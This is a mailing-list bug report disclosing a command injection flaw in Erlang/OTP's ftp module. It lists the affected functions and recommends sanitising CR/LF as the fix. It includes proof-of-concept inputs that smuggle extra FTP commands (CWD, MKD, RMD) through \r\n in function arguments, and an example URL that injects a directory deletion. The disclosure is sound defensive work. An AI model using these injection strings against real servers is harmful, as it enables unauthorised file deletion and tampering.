[erlang-bugs] FTP command injection vulnerability in module "ftp"

Seba argos83@REDACTED
Mon Jan 27 12:10:13 CET 2014 

Hi!

There is an FTP Command Injection vulnerability in the "ftp" module.

All those functions that write any string argument in the control
socket seem to be vulnerable:


user/3
user/4
account/2
cd/2
ls/2
nlist/2
rename/3
delete/2
mkdir/2
rmdir/2
recv/2
recv/3
recv_bin/2,
recv_chunk_start/2
send/3
send_bin/3
send_chunk_start/2
append_chunk_start/2
append/2
append/3
append_bin/3


Vulnerability Description
-------------------------

An FTP communication consists of two channels:
 * A TCP control channel: Text-based, and served by the FTP Server.
 * A TCP data channel: Which is created either by the FTP Client or
the FTP Server depending on data being transmitted using active or
passive mode.
The control channel works in a request-response fashion. Each command
is issued by the client in a single line (ending with a carriage
return and a new line: \r\n).

By injecting a \r\n sequence followed by a new command in a function
argument you get the ftp module to write the whole string in the
socket.

E.g. the following erlang shell session:

1> inets:start().
ok
2> {ok, Pid} = inets:start(ftpc, [{host, "127.0.0.1"}]).
{ok,<0.46.0>}
3> ftp:user(Pid, "anonymous", "password\r\nCWD pub\r\nMKD new_dir").
ok
4> ftp:cd(Pid, "/pub\r\nRMD new_dir\r\nPASV").
ok


Generates the following FTP session:

FTP command: Client "127.0.0.1", "USER anonymous"
FTP response: Client "127.0.0.1", "331 Please specify the password."
FTP command: Client "127.0.0.1", "PASS <password>"
FTP response: Client "127.0.0.1", "230 Login successful."
FTP command: Client "127.0.0.1", "CWD pub"
FTP response: Client "127.0.0.1", "250 Directory successfully changed."
FTP command: Client "127.0.0.1", "MKD new_dir"
FTP response: Client "127.0.0.1", "257 "/pub/new_dir" created"
FTP command: Client "127.0.0.1", "CWD /pub"
FTP response: Client "127.0.0.1", "250 Directory successfully changed."
FTP command: Client "127.0.0.1", "RMD new_dir"
FTP response: Client "127.0.0.1", "250 Remove directory operation successful."
FTP command: Client "127.0.0.1", "PASV"
FTP response: Client "127.0.0.1", "227 Entering Passive Mode
(127,0,0,1,130,161)."


Attack Scenario Example
-----------------------

A web server allow users to navigate and download documents.
Internally the web server connects to a private ftp server using OTP
"ftp" module.
An attacker might take advantage of the vulnerability to execute
actions that aren't supposed to be exposed. E.g. delete a directory by
requesting:

http://www.example.com/list_dir.yaws?dir=/docs/%0d%0aRMD+/docs

Tested on
---------
 - R15B03
 - Ubuntu 12.04 x86_64
 - FTP Sever: vsftpd

Fixing
------

String arguments used to create the command request should be
sanitized first (by removing "\r" and "\n").



Sebastián Tello

More information about the erlang-bugs mailing list